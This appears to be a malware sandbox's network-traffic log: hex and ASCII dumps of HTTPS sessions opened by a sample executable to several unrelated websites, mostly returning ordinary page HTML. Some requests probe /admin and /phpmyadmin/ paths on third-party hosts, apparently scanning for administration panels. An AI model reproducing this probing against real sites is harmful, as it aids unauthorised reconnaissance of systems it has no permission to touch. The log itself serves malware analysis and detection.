                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16026INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 20 4c 61 73 74 20 50 75 62 6c 69 73 68 65 64 3a 20 54 68 75 20 4e 6f 76 20 32 33 20 32 30 32 33 20 31 34 3a 30 37 3a 33 37 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 0a 20 20 64 61 74 61 2d 77 66 2d 70 61 67 65 3d 22 36 35 35 37 39 32 66 62 30 36 30 66 34 66 34 30 65 33 37 66 62 36 62 64 22 0a 20 20 64 61 74 61 2d 77 66 2d 73 69 74 65 3d 22 36 34 30 30 63 34 39 64 66 66 34 62 34 35 38 36 34 65 38 39 36 61 34 62 22 0a 20 20 6c 61 6e 67 3d 22 65 73 22 0a 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>... Last Published: Thu Nov 23 2023 14:07:37 GMT+0000 (Coordinated Universal Time) --><html data-wf-page="655792fb060f4f40e37fb6bd" data-wf-site="6400c49dff4b45864e896a4b" lang="es"> <head> <meta charset="utf-8" /> <ti
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 75 69 2d 74 65 78 74 2d 73 69 7a 65 2d 73 6d 61 6c 6c 2d 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 43 6f 6e 6f 63 65 20 65 6c 20 65 73 74 61 64 6f 20 64 65 20 74 75 20 66 61 63 74 75 72 61 63 69 c3 b3 6e 20 70 6f 72 20 63 6f 6e 74 61 63 74 6f 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: v> <div class="uui-text-size-small-2"> Conoce el estado de tu facturacin por contacto. </div> </div> </a>
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    467192.168.2.45205254.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC167OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC294INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 70 61 67 65 73 2f 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:45 GMTServer: Apache/2.4.52 (Ubuntu)location: https://ce-logic.com/admin/pages/vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateContent-Length: 0Connection: closeCon


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    468192.168.2.451334117.20.63.1484436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: student.debritto.sch.id
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 58 2d 43 61 63 68 65 3a 20 48 49 54 20 66 72 6f 6d 20 42 61 63 6b 65 6e 64 0d 0a 53 74 72 69 63 74 2d 54 72 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginx/1.20.1Date: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 238Connection: closeLocation: http://117.20.63.148:2030/pma/X-Cache: HIT from BackendStrict-Tra
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 31 37 2e 32 30 2e 36 33 2e 31 34 38 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://117.20.63.148:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    469192.168.2.45163254.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC267OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: originDirect=true; SESSION=d0ba3db7-afea-40d5-bf45-8ca13b5deab0
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Strict-Transport-Security: max-age=315360
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC15988INData Raw: 37 65 36 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 7e69<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC16381INData Raw: 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 68 72 65 66 3d 22 2f 63 61 74 65 67 6f 72 69 61 2f 6d 61 71 75 69 6e 61 73 2d 65 71 75 69 70 61 6d 65 6e 74 6f 73 2f 63 61 6d 62 69 6f 2d 74 72 61 6e 73 6d 69 73 73 61 6f 22 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 20 20 20 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 63 61 6d 62 69 6f 2d 74 72 61 6e 73 6d 69 73 73 61 6f 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09
                                                                                                                                                                                                    Data Ascii: class="sub-menu-item-link" itemprop="url" href="/categoria/maquinas-equipamentos/cambio-transmissao" onclick="sendKinesisDataAjax({actionID: 'click',actionData:`cambio-transmissao - category2`})">
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 37 66 65 30 0d 0a 0a 09 09 09 0a 09 09 0a 09 0a 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20 67 65 74 4d 61 63 68 69 6e 65 49 6d 67 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 74 68 65 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 27 20 2b 20 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 2b 20 22 2f 22 3b 0a 09 09 72 65 74 75 72 6e 20 74 68 65 55 72 6c 20 2b 20 27 2e 2e 2f 2e 2e 2f 61 73 73 65 74 73 2f 61 6d 61 7a 6f 6e 2d 34 32 33 31 2f 74 72 61 63 74 6f 72 2e 70 6e 67 27 3b 0a 09 7d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 09 09 3c 2f 68 65 61 64 65 72 3e 0a 0a 09 09 0a 09 0a 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 20 69 64 3d 22 69 73 45 6e 61 62 6c 65 4d 75 6c 74
                                                                                                                                                                                                    Data Ascii: 7fe0<script>var getMachineImg = function(){var theUrl = 'https://' + location.hostname + "/";return theUrl + '../../assets/amazon-4231/tractor.png';}</script></header><input type="hidden" value="false" id="isEnableMult
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16360INData Raw: 73 3d 22 66 6f 6f 74 65 72 5f 5f 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 3e 0a 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 2e 63 77 73 2e 64 69 67 69 74 61 6c 2f 66 6f 72 6e 65 63 65 64 6f 72 65 73 2f 66 75 6c 6c 2f 72 65 63 68 2d 61 67 72 69 63 6f 6c 61 31 2e 6a 70 67 22 20 63 6c 61 73 73 3d 22 69 6d 67 2d 6c 6f 67 6f 22 20 61 6c 74 3d 22 4c 6f 67 6f 22 2f 3e 0a 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6c 6f 67 22 20 3e 0a 09 09 09 09 3c 64 69 76 3e 0a
                                                                                                                                                                                                    Data Ascii: s="footer__logo"><a href="/" itemprop="url"><img src="https://images.cws.digital/fornecedores/full/rech-agricola1.jpg" class="img-logo" alt="Logo"/></a></div></div><div class="container-secondary-blog" ><div>
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16384INData Raw: 37 66 65 30 0d 0a 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 70 72 69 63 65 43 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 42 52 4c 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 43 6f 6e 64 69 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4e 65 77 43 6f 6e 64 69 74 69 6f 6e 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 61 76 61 69 6c 61 62 69 6c 69 74 79 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 53 74 6f 63 6b 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 70 72 69 63 65 22 20 63 6f
                                                                                                                                                                                                    Data Ascii: 7fe0https://www.rech.com/"/><meta itemprop="priceCurrency" content="BRL"/><meta itemprop="itemCondition" content="https://schema.org/NewCondition"/><meta itemprop="availability" content="https://schema.org/InStock"/><meta itemprop="price" co
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC16360INData Raw: 65 73 74 2e 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 74 6f 63 6b 2d 69 64 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 74 6f 63 6b 49 64 7d 7d 22 0a 09 09 09 09 09 09 69 64 3d 22 73 6b 75 2d 61 64 64 2d 74 6f 2d 63 61 72 74 2d 62 74 6e 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 6c 79 70 68 69 63 6f 6e 20 67 6c 79 70 68 69 63 6f 6e 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 22 3e 3c 2f 73 70 61 6e 3e 41 64 69 63 69 6f 6e 61 72 20 61 6f 20 63 61 72 72 69 6e 68 6f 0a 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0a 0a 09 09 09 09 0a 0a 09 09 09 09 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 61 6c 2d 63 61 6c 63 75 6c 61 74 6f 72 20 6d 6f 64 61 6c 20 66
                                                                                                                                                                                                    Data Ascii: est.stockRemaining}}"data-stock-id="{{sku.best.stockId}}"id="sku-add-to-cart-btn"><span class="glyphicon glyphicon-shopping-cart"></span>Adicionar ao carrinho</button></form><div class="modal-calculator modal f
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC3250INData Raw: 63 61 62 0d 0a 0a 09 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 66 75 6e 63 74 69 6f 6e 20 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 6e 61 6d 65 29 20 7b 0a 20 20 20 20 09 09 09 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 6e 61 6d 65 20 2b 20 27 3d 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 30 31 20 47 4d 54 3b 27 3b 0a 09 09 09 7d 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 74 6f 6b 65 6e 27 29 3b 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 73 75 62 64 6f 6d 61 69 6e 27 29 3b 0a 09 09 09 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 27 74 6f 6b 65 6e 2d 77 73 27 29 3b 0a 09 09 3c 2f 73 63 72 69 70 74 3e 0a 09
                                                                                                                                                                                                    Data Ascii: cab<script type="text/javascript">function deleteCookie(name) { document.cookie = name + '=; expires=Thu, 01 Jan 1970 00:00:01 GMT;';}deleteCookie('token');deleteCookie('subdomain');deleteCookie('token-ws');</script>
                                                                                                                                                                                                    2023-11-26 05:59:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    470192.168.2.45169315.236.29.1064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: getquipu.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC358INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 34 36 34 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 33 20 4e 6f 76 20 32 30 32 33 20 31 34 3a 33 35 3a 30 33 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 36 35 35 66 36 33 31 37 2d 31 37 31 62 31 22 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:45 GMTContent-Type: text/htmlContent-Length: 94641Connection: closeLast-Modified: Thu, 23 Nov 2023 14:35:03 GMTETag: "655f6317-171b1"Strict-Transport-Security: max-age=31536000; incl
